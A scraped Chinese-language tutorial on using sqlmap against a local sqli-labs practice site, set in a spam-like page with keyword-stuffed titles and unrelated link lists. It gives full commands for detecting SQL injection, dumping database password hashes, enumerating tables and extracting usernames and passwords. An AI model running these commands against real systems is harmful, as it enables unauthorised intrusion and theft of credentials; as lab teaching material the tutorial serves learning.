当前位置: 首页 > news >正文

门户网站建设 工具启动互联全网营销推广

门户网站建设 工具,启动互联全网营销推广,网站建设公司广告语,网站建设视频教程 百度云本文用的是kali自带的sqlmap工具 我们通过常用命令来理解sqlmap的基本使用 目录 检测注入 获取敏感信息 获取表 获取表的字段 获取数据 --technique 使用指定的注入方式 使用基于时间的延时注入 支持多种注入检测 默认是全部 注入时使用随机的 HTTP User-Agent 设置超时时间 读…本文用的是kali自带的sqlmap工具 我们通过常用命令来理解sqlmap的基本使用 目录 检测注入 获取敏感信息 获取表 获取表的字段 获取数据 --technique 使用指定的注入方式 使用基于时间的延时注入  支持多种注入检测 默认是全部 注入时使用随机的 HTTP User-Agent 设置超时时间 读取文本进行SQL注入检测 检测注入 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 -dbms mysql -v 1 -batch-u                       检测的url 双引号 表示这是一段字符串 -dbms                指定攻击的数据引擎 -batch        会自动进行默认操作不用进行交互信息 确定  -v                       输出信息登记为1        输出信息详细程度级别0-6默认为 1 0只显示Python回源tracebacks错误error和关键criticle)信息。 1同时显示信息(info)和警告信息warning)默认为1 2: 同时显示调试信息debug 3同时显示注入的有效载荷payloads 4同时显示http请求 5同时显示http响应头 6同时显示http响应内容 级别越高信息就越详细根据需求选择合适的输出信息。 获取敏感信息 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql --current-user --current-db --is-dba --passwords -v 1 -batch --current-user                 用户连接的用户 --currnet-db                    当前库 --is-dba                          是否root权限 --passwords                   获取数据库的密码 使用这个命令 sqlmap找到密文时会提示你是否进行hash破解 如果需要选择合适的字典。 获取表 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security --tables 在获取当前库、可以根据库列出表。 -D                         指定库 --tables                 列出所有表 获取表的字段 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security -T users --columns 获取某个表的所有字段 -T                                         指定某个表 --columns                             获取字段 获取数据 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security -T users -C username,password --dump --dump                         是导出数据所有内容 -C                                username,password 获取字段的内容 --technique 使用指定的注入方式 --technique 参数的值的解释 B:Boolean-basedblindSQLinjection布尔型注入 E:Error-basedSQLinjection报错型注入 U:UNIONquerySQLinjection可联合查询注入 S:StackedqueriesSQLinjection可多语句查询注入 T:Time-basedblindSQLinjection基于时间延迟注入 Q:InlineSQLInjection(内联注入) 使用基于时间的延时注入 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --techniqueT 支持多种注入检测 默认是全部 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --techniqueBEUT 注入时使用随机的 HTTP User-Agent sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --random-agent 设置超时时间 --time-out 这个参数是设置超时时间 有得网页响应比较慢可以使用这个参数来增大访问超时的时间。默认是30 sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --timeout10 读取文本进行SQL注入检测 sqlmap -r post.txt --batchPOST /sqllabs/Less-11/ HTTP/1.1 Host: 192.168.164.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 30 Origin: http://192.168.164.1 Connection: close Referer: http://192.168.164.1/sqllabs/Less-11/ Upgrade-Insecure-Requests: 1uname1passwd1submitSubmit
http://www.w-s-a.com/news/995035/

相关文章:

  • 现在建网站多少钱推广营销费
  • 联想企业网站建设的思路西安网站建设阳建
  • 网站内容 内链网站建设电话销售工作总结
  • 系统网站开发知名的摄影网站有哪些
  • 网站拍照的幕布扬中网站建设价位
  • 网站ie兼容性差西安小程序开发的公司
  • 上海网站建设培训app网站开发成本
  • 个人网站icp外贸网站开发 河南
  • 遵义建设网站无锡市规划建设局网站
  • 海外留学网站建设方案门户网站的发布特点
  • 网站建设不赚钱net112企业建站系统
  • 网站建设团队管理模板贵州省住房和城乡建设部网站
  • 曲沃网站建设网上学编程的有哪些比较好的网站
  • 厦门网站建设慕枫学做网站需要多久
  • 爱奇艺做任务领vip网站设计广告图片
  • 中科汇联网站建设手册上海公司名称注册查询网
  • 网站建设电子商务课总结和体会关于做网站书籍
  • 仪征网站建设公司哪家好简单网页制作素材图片
  • 甘肃第九建设集团公司网站潍坊个人做网站
  • 如何做后台网站的教程网站建设 关于我们
  • 极速网站建设哪家好连云港百度推广网站建设
  • 医院网站建设的目标wordpress中英文网站模板
  • 门户型网站开发难度网站导航栏有哪些
  • 推荐做任务网站软件定制开发哪家好
  • 邯郸兄弟建站第三方仓储配送公司
  • 商丘家具网站建设wordpress 添加代码
  • 基础建设的网站有哪些内容成都科技网站建设咨询电话
  • 券多多是谁做的网站招聘网站开发模板
  • 网站主机一般选哪种的企业数字展厅
  • 网站建设该如何学衡水建设局网站首页